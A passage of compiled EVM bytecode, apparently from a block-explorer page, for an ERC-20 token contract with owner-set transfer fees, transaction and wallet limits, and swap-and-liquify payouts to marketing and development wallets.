0565b6000819050602082019050919050565b6149fd816137d2565b82525050565b6000614a0f83836149f4565b60208301905092915050565b6000602082019050919050565b6000614a33826149c8565b614a3d81856149d3565b9350614a48836149e4565b8060005b83811015614a79578151614a608882614a03565b9750614a6b83614a1b565b925050600181019050614a4c565b5085935050505092915050565b600060a082019050614a9b60008301886136c8565b614aa860208301876149b9565b8181036040830152614aba8186614a28565b9050614ac96060830185613aa1565b614ad660808301846136c8565b9695505050505050565b600060c082019050614af56000830189613aa1565b614b0260208301886136c8565b614b0f60408301876149b9565b614b1c60608301866149b9565b614b296080830185613aa1565b614b3660a08301846136c8565b979650505050505050565b600081519050614b5081613810565b92915050565b600080600060608486031215614b6f57614b6e6137ad565b5b6000614b7d86828701614b41565b9350506020614b8e86828701614b41565b9250506040614b9f86828701614b41565b915050925092509256fea26469706673582212205534ba0ce81f15f43bc70d8e5f1ad919236c97933454f4bed5ce2002dd9625d964736f6c634300080d0033000000000000000000000000382500b11e303fa903dfaba2d406a6a6fb8ede9e

Deployed Bytecode

0x6080604052600436106102e85760003560e01c8063750c11b611610190578063b2f5260a116100dc578063dd62ed3e11610095578063e6c75f711161006f578063e6c75f7114610b45578063f2fde38b14610b70578063fc3c28af14610b99578063fce589d814610bc4576102ef565b8063dd62ed3e14610ab4578063e2f4560514610af1578063e5c4005c14610b1c576102ef565b8063b2f5260a146109a8578063b3b5e043146109d1578063b62496f5146109fa578063c024666814610a37578063c49b9a8014610a60578063d8020a1814610a89576102ef565b806395d89b4111610149578063a457c2d711610123578063a457c2d7146108d8578063a4d15b6414610915578063a9059cbb14610940578063b06837551461097d576102ef565b806395d89b411461085b5780639a7a23d614610886578063a2657778146108af576102ef565b8063750c11b61461075d57806375f0a8741461078657806385141a77146107b15780638da5cb5b146107dc5780638ea5220f1461080757806391d55f4114610832576102ef565b80634551bbe91161024f5780635c38ffe21161020857806365b8dbc0116101e257806365b8dbc0146106b55780636a486a8e146106de57806370a0823114610709578063715018a614610746576102ef565b80635c38ffe21461063a5780635d098b38146106635780636078a9b51461068c576102ef565b80634551bbe91461051657806349bd5a5e146105535780634a74bb021461057e5780634fbee193146105a9578063533f9630146105e65780635aa821a91461060f576102ef565b80631aa04b88116102a15780631aa04b88146104065780631f53ac021461043157806323b872dd1461045a578063313ce56714610497578063364333f4146104c257806339509351146104d9576102ef565b806302259e9e146102f457806306fdde031461031f578063095ea7b31461034a5780630db722c4146103875780631694505e146103b057806318160ddd146103db576102ef565b366102ef57005b600080fd5b34801561030057600080fd5b50610309610bef565b60405161031691906136d7565b60405180910390f35b34801561032b57600080fd5b50610334610bf5565b604051610341919061378b565b60405180910390f35b34801561035657600080fd5b50610371600480360381019061036c919061383c565b610c87565b60405161037e9190613897565b60405180910390f35b34801561039357600080fd5b506103ae60048036038101906103a991906138b2565b610ca5565b005b3480156103bc57600080fd5b506103c5610da2565b6040516103d29190613964565b60405180910390f35b3480156103e757600080fd5b506103f0610dc8565b6040516103fd91906136d7565b60405180910390f35b34801561041257600080fd5b5061041b610dd2565b60405161042891906136d7565b60405180910390f35b34801561043d57600080fd5b50610458600480360381019061045391906139bd565b610dd8565b005b34801561046657600080fd5b50610481600480360381019061047c91906139ea565b610e98565b60405161048e9190613897565b60405180910390f35b3480156104a357600080fd5b506104ac610f90565b6040516104b99190613a59565b60405180910390f35b3480156104ce57600080fd5b506104d7610f99565b005b3480156104e557600080fd5b5061050060048036038101906104fb919061383c565b61100a565b60405161050d9190613897565b60405180910390f35b34801561052257600080fd5b5061053d60048036038101906105389190613a74565b6110b6565b60405161054a91906136d7565b60405180910390f35b34801561055f57600080fd5b506105686110ce565b6040516105759190613ab0565b60405180910390f35b34801561058a57600080fd5b506105936110f2565b6040516105a09190613897565b60405180910390f35b3480156105b557600080fd5b506105d060048036038101906105cb9190613a74565b611105565b6040516105dd9190613897565b60405180910390f35b3480156105f257600080fd5b5061060d60048036038101906106089190613acb565b61115b565b005b34801561061b57600080fd5b50610624611227565b60405161063191906136d7565b60405180910390f35b34801561064657600080fd5b50610661600480360381019061065c9190613acb565b61122d565b005b34801561066f57600080fd5b5061068a600480360381019061068591906139bd565b611312565b005b34801561069857600080fd5b506106b360048036038101906106ae9190613acb565b6113d2565b005b3480156106c157600080fd5b506106dc60048036038101906106d79190613a74565b61149e565b005b3480156106ea57600080fd5b506106f361166a565b60405161070091906136d7565b60405180910390f35b34801561071557600080fd5b50610730600480360381019061072b9190613a74565b611670565b60405161073d91906136d7565b60405180910390f35b34801561075257600080fd5b5061075b6116b8565b005b34801561076957600080fd5b50610784600480360381019061077f9190613acb565b611740565b005b34801561079257600080fd5b5061079b6117c6565b6040516107a89190613b07565b60405180910390f35b3480156107bd57600080fd5b506107c66117ec565b6040516107d39190613ab0565b60405180910390f35b3480156107e857600080fd5b506107f1611812565b6040516107fe9190613ab0565b60405180910390f35b34801561081357600080fd5b5061081c61183c565b6040516108299190613b07565b60405180910390f35b34801561083e57600080fd5b5061085960048036038101906108549190613acb565b611862565b005b34801561086757600080fd5b50610870611947565b60405161087d919061378b565b60405180910390f35b34801561089257600080fd5b506108ad60048036038101906108a89190613b4e565b6119d9565b005b3480156108bb57600080fd5b506108d660048036038101906108d19190613b8e565b611af1565b005b3480156108e457600080fd5b506108ff60048036038101906108fa919061383c565b611b8a565b60405161090c9190613897565b60405180910390f35b34801561092157600080fd5b5061092a611c75565b6040516109379190613897565b60405180910390f35b34801561094c57600080fd5b506109676004803603810190610962919061383c565b611c88565b6040516109749190613897565b60405180910390f35b34801561098957600080fd5b50610992611ca6565b60405161099f91906136d7565b60405180910390f35b3480156109b457600080fd5b506109cf60048036038101906109ca9190613acb565b611cac565b005b3480156109dd57600080fd5b506109f860048036038101906109f39190613acb565b611d78565b005b348015610a0657600080fd5b50610a216004803603810190610a1c9190613a74565b611e5d565b604051610a2e9190613897565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190613b4e565b611e7d565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190613b8e565b612034565b005b348015610a9557600080fd5b50610a9e612104565b604051610aab91906136d7565b60405180910390f35b348015610ac057600080fd5b50610adb6004803603810190610ad69190613bbb565b61210a565b604051610ae891906136d7565b60405180910390f35b348015610afd57600080fd5b50610b06612191565b604051610b1391906136d7565b60405180910390f35b348015610b2857600080fd5b50610b436004803603810190610b3e9190613acb565b612197565b005b348015610b5157600080fd5b50610b5a612261565b604051610b6791906136d7565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b929190613a74565b612267565b005b348015610ba557600080fd5b50610bae61235e565b604051610bbb91906136d7565b60405180910390f35b348015610bd057600080fd5b50610bd9612364565b604051610be691906136d7565b60405180910390f35b60085481565b606060038054610c0490613c2a565b80601f0160208091040260200160405190810160405280929190818152602001828054610c3090613c2a565b8015610c7d5780601f10610c5257610100808354040283529160200191610c7d565b820191906000526020600020905b815481529060010190602001808311610c6057829003601f168201915b5050505050905090565b6000610c9b610c9461236a565b8484612372565b6001905092915050565b610cad61236a565b73ffffffffffffffffffffffffffffffffffffffff16610ccb611812565b73ffffffffffffffffffffffffffffffffffffffff1614610d21576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1890613ca7565b60405180910390fd5b6064610d4882610d3a858761253b90919063ffffffff16565b61253b90919063ffffffff16565b14610d88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7f90613d39565b60405180910390fd5b826011819055508160128190555080601381905550505050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b600e5481565b610de061236a565b73ffffffffffffffffffffffffffffffffffffffff16610dfe611812565b73ffffffffffffffffffffffffffffffffffffffff1614610e54576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e4b90613ca7565b60405180910390fd5b80601560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000610ea5848484612551565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610ef061236a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610f70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6790613dcb565b60405180910390fd5b610f8485610f7c61236a565b858403612372565b60019150509392505050565b60006012905090565b6000479050601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f19350505050158015611006573d6000803e3d6000fd5b5050565b60006110ac61101761236a565b84846001600061102561236a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110a79190613e1a565b612372565b6001905092915050565b60186020528060005260406000206000915090505481565b7f0000000000000000000000007758fac8c1be528f694de0f283d1b31d73d3bbe281565b600760159054906101000a900460ff1681565b6000601660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b61116361236a565b73ffffffffffffffffffffffffffffffffffffffff16611181611812565b73ffffffffffffffffffffffffffffffffffffffff16146111d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111ce90613ca7565b60405180910390fd5b80600c81905550600a600c541115611224576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121b90613ebc565b60405180910390fd5b50565b60095481565b61123561236a565b73ffffffffffffffffffffffffffffffffffffffff16611253611812565b73ffffffffffffffffffffffffffffffffffffffff16146112a9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112a090613ca7565b60405180910390fd5b806008819055506112cc6103e86112be610dc8565b612c9f90919063ffffffff16565b6008541161130f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130690613f28565b60405180910390fd5b50565b61131a61236a565b73ffffffffffffffffffffffffffffffffffffffff16611338611812565b73ffffffffffffffffffffffffffffffffffffffff161461138e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161138590613ca7565b60405180910390fd5b80601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6113da61236a565b73ffffffffffffffffffffffffffffffffffffffff166113f8611812565b73ffffffffffffffffffffffffffffffffffffffff161461144e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161144590613ca7565b60405180910390fd5b80600e819055506014600e54111561149b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161149290613ebc565b60405180910390fd5b50565b6114a661236a565b73ffffffffffffffffffffffffffffffffffffffff166114c4611812565b73ffffffffffffffffffffffffffffffffffffffff161461151a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161151190613ca7565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036115aa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115a190613fba565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8fc842bbd331dfa973645f4ed48b11683d501ebf1352708d77a5da2ab49a576e60405160405180910390a380600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600d5481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6116c061236a565b73ffffffffffffffffffffffffffffffffffffffff166116de611812565b73ffffffffffffffffffffffffffffffffffffffff1614611734576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161172b90613ca7565b60405180910390fd5b61173e6000612cb5565b565b61174861236a565b73ffffffffffffffffffffffffffffffffffffffff16611766611812565b73ffffffffffffffffffffffffffffffffffffffff16146117bc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117b390613ca7565b60405180910390fd5b80600a8190555050565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b61186a61236a565b73ffffffffffffffffffffffffffffffffffffffff16611888611812565b73ffffffffffffffffffffffffffffffffffffffff16146118de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118d590613ca7565b60405180910390fd5b80600b819055506119016103e86118f3610dc8565b612c9f90919063ffffffff16565b600b5411611944576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193b90613f28565b60405180910390fd5b50565b60606004805461195690613c2a565b80601f016020809104026020016040519081016040528092919081815260200182805461198290613c2a565b80156119cf5780601f106119a4576101008083540402835291602001916119cf565b820191906000526020600020905b8154815290600101906020018083116119b257829003601f168201915b5050505050905090565b6119e161236a565b73ffffffffffffffffffffffffffffffffffffffff166119ff611812565b73ffffffffffffffffffffffffffffffffffffffff1614611a55576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a4c90613ca7565b60405180910390fd5b7f0000000000000000000000007758fac8c1be528f694de0f283d1b31d73d3bbe273ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ae3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ada90614072565b60405180910390fd5b611aed8282612d7b565b5050565b611af961236a565b73ffffffffffffffffffffffffffffffffffffffff16611b17611812565b73ffffffffffffffffffffffffffffffffffffffff1614611b6d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b6490613ca7565b60405180910390fd5b80600760166101000a81548160ff02191690831515021790555050565b60008060016000611b9961236a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015611c56576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c4d90614104565b60405180910390fd5b611c6a611c6161236a565b85858403612372565b600191505092915050565b600760169054906101000a900460ff1681565b6000611c9c611c9561236a565b8484612551565b6001905092915050565b60115481565b611cb461236a565b73ffffffffffffffffffffffffffffffffffffffff16611cd2611812565b73ffffffffffffffffffffffffffffffffffffffff1614611d28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1f90613ca7565b60405180910390fd5b80600d81905550600a600d541115611d75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d6c90613ebc565b60405180910390fd5b50565b611d8061236a565b73ffffffffffffffffffffffffffffffffffffffff16611d9e611812565b73ffffffffffffffffffffffffffffffffffffffff1614611df4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611deb90613ca7565b60405180910390fd5b80600981905550611e176103e8611e09610dc8565b612c9f90919063ffffffff16565b60095411611e5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e5190613f28565b60405180910390fd5b50565b60176020528060005260406000206000915054906101000a900460ff1681565b611e8561236a565b73ffffffffffffffffffffffffffffffffffffffff16611ea3611812565b73ffffffffffffffffffffffffffffffffffffffff1614611ef9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ef090613ca7565b60405180910390fd5b801515601660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151503611f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f8290614196565b60405180910390fd5b80601660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516120289190613897565b60405180910390a25050565b61203c61236a565b73ffffffffffffffffffffffffffffffffffffffff1661205a611812565b73ffffffffffffffffffffffffffffffffffffffff16146120b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120a790613ca7565b60405180910390fd5b80600760156101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc159816040516120f99190613897565b60405180910390a150565b60125481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600a5481565b61219f61236a565b73ffffffffffffffffffffffffffffffffffffffff166121bd611812565b73ffffffffffffffffffffffffffffffffffffffff1614612213576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161220a90613ca7565b60405180910390fd5b6005811115612257576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161224e90614202565b60405180910390fd5b80600f8190555050565b600b5481565b61226f61236a565b73ffffffffffffffffffffffffffffffffffffffff1661228d611812565b73ffffffffffffffffffffffffffffffffffffffff16146122e3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122da90613ca7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603612352576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161234990614294565b60405180910390fd5b61235b81612cb5565b50565b60135481565b600f5481565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036123e1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123d890614326565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612450576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612447906143b8565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161252e91906136d7565b60405180910390a3505050565b600081836125499190613e1a565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036125c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125b79061444a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361262f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612626906144dc565b60405180910390fd5b600081036126485761264383836000612eae565b612c9a565b601760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156126eb5750601660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156127415750601660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561282e5760095481111561278b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127829061456e565b60405180910390fd5b600061279683611670565b9050600b5482826127a79190613e1a565b11156127e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127df90614600565b60405180910390fd5b42601860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b601760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156128d15750601660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156129275750601660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561297257600854811115612971576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161296890614692565b60405180910390fd5b5b600061297d30611670565b90506000600a5482101590508080156129a35750600760149054906101000a900460ff16155b80156129f85750601760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b8015612a105750600760159054906101000a900460ff165b15612a2457600a549150612a238261312d565b5b600080601660008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015612acb5750601660008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c8a576000600c549050601760008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615612bc3576000601860008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205442612b7691906146b2565b9050600760169054906101000a900460ff168015612b975750620151808111155b15612ba657600e549150612bc1565b600760169054906101000a900460ff16612bc057600d5491505b5b505b612be96064612bdb838961335790919063ffffffff16565b612c9f90919063ffffffff16565b9250612c136064612c05600f548961335790919063ffffffff16565b612c9f90919063ffffffff16565b91506000831115612c2a57612c29883085612eae565b5b6000821115612c6157612c6088601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684612eae565b5b612c86612c77838561253b90919063ffffffff16565b8761336d90919063ffffffff16565b9550505b612c95878787612eae565b505050505b505050565b60008183612cad9190614715565b905092915050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b801515601760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151503612e0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612e04906147b8565b60405180910390fd5b80601760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612f1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612f149061444a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612f8c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612f83906144dc565b60405180910390fd5b612f97838383613383565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561301d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016130149061484a565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546130b09190613e1a565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161311491906136d7565b60405180910390a3613127848484613388565b50505050565b6001600760146101000a81548160ff021916908315150217905550600061317260646131646011548561335790919063ffffffff16565b612c9f90919063ffffffff16565b9050600061318a600283612c9f90919063ffffffff16565b905060006131a1828461336d90919063ffffffff16565b905060004790506131b18361338d565b60006131c6824761336d90919063ffffffff16565b90506131d28382613606565b6131ed6131e8868861336d90919063ffffffff16565b61338d565b601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc61326661324360135460125461253b90919063ffffffff16565b6132586012544761335790919063ffffffff16565b612c9f90919063ffffffff16565b9081150290604051600060405180830381858888f19350505050158015613291573d6000803e3d6000fd5b50601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f193505050501580156132fa573d6000803e3d6000fd5b507f28fc98272ce761178794ad6768050fea1648e07f1e2ffe15afd3a290f8381486848260405161332c92919061486a565b60405180910390a150505050506000600760146101000a81548160ff02191690831515021790555050565b600081836133659190614893565b905092915050565b6000818361337b91906146b2565b905092915050565b505050565b505050565b6000600267ffffffffffffffff8111156133aa576133a96148ed565b5b6040519080825280602002602001820160405280156133d85781602001602082028036833780820191505090505b50905030816000815181106133f0576133ef61491c565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015613497573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906134bb9190614960565b816001815181106134cf576134ce61491c565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250508161353630600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661210a565b101561356c5761356b30600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600019612372565b5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016135d0959493929190614a86565b600060405180830381600087803b1580156135ea57600080fd5b505af11580156135fe573d6000803e3d6000fd5b505050505050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080613652611812565b426040518863ffffffff1660e01b815260040161367496959493929190614ae0565b60606040518083038185885af1158015613692573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906136b79190614b56565b5050505050565b6000819050919050565b6136d1816136be565b82525050565b60006020820190506136ec60008301846136c8565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561372c578082015181840152602081019050613711565b8381111561373b576000848401525b50505050565b6000601f19601f8301169050919050565b600061375d826136f2565b61376781856136fd565b935061377781856020860161370e565b61378081613741565b840191505092915050565b600060208201905081810360008301526137a58184613752565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006137dd826137b2565b9050919050565b6137ed816137d2565b81146137f857600080fd5b50565b60008135905061380a816137e4565b92915050565b613819816136be565b811461382457600080fd5b50565b60008135905061383681613810565b92915050565b60008060408385031215613853576138526137ad565b5b6000613861858286016137fb565b925050602061387285828601613827565b9150509250929050565b60008115159050919050565b6138918161387c565b82525050565b60006020820190506138ac6000830184613888565b92915050565b6000806000606084860312156138cb576138ca6137ad565b5b60006138d986828701613827565b93505060206138ea86828701613827565b92505060406138fb86828701613827565b9150509250925092565b6000819050919050565b600061392a613925613920846137b2565b613905565b6137b2565b9050919050565b600061393c8261390f565b9050919050565b600061394e82613931565b9050919050565b61395e81613943565b82525050565b60006020820190506139796000830184613955565b92915050565b600061398a826137b2565b9050919050565b61399a8161397f565b81146139a557600080fd5b50565b6000813590506139b781613991565b92915050565b6000602082840312156139d3576139d26137ad565b5b60006139e1848285016139a8565b91505092915050565b600080600060608486031215613a0357613a026137ad565b5b6000613a11868287016137fb565b9350506020613a22868287016137fb565b9250506040613a3386828701613827565b9150509250925092565b600060ff82169050919050565b613a5381613a3d565b82525050565b6000602082019050613a6e6000830184613a4a565b92915050565b600060208284031215613a8a57613a896137ad565b5b6000613a98848285016137fb565b91505092915050565b613aaa816137d2565b82525050565b6000602082019050613ac56000830184613aa1565b92915050565b600060208284031215613ae157613ae06137ad565b5b6000613aef84828501613827565b91505092915050565b613b018161397f565b82525050565b6000602082019050613b1c6000830184613af8565b92915050565b613b2b8161387c565b8114613b3657600080fd5b50565b600081359050613b4881613b22565b92915050565b60008060408385031215613b6557613b646137ad565b5b6000613b73858286016137fb565b9250506020613b8485828601613b39565b9150509250929050565b600060208284031215613ba457613ba36137ad565b5b6000613bb284828501613b39565b91505092915050565b60008060408385031215613bd257613bd16137ad565b5b6000613be0858286016137fb565b9250506020613bf1858286016137fb565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680613c4257607f821691505b602082108103613c5557613c54613bfb565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000613c916020836136fd565b9150613c9c82613c5b565b602082019050919050565b60006020820190508181036000830152613cc081613c84565b9050919050565b7f746f74616c2070657263656e74616765206d75737420626520657175616c207460008201527f6f20313030000000000000000000000000000000000000000000000000000000602082015250565b6000613d236025836136fd565b9150613d2e82613cc7565b604082019050919050565b60006020820190508181036000830152613d5281613d16565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b6000613db56028836136fd565b9150613dc082613d59565b604082019050919050565b60006020820190508181036000830152613de481613da8565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000613e25826136be565b9150613e30836136be565b9250827ffffffffffffffffffffffffffffffffffffffffffffffffffffff